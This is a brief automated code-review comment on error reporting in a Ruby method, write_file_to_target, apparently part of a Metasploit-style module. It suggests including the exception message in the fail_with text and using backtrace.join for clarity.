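Review bot: `elog` records the exception class, message and backtrace, but the `fail_with` text in `write_file_to_target` still says only that the write was unsuccessful, so the cause reaches the framework log and not the failure the operator sees. Appending the message, `fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful: #{e.message}")`, would close that gap. `e.backtrace * "\n"` relies on `Array#*` acting as join; `e.backtrace.join("\n")` says the same thing more plainly. The method starts outside this hunk.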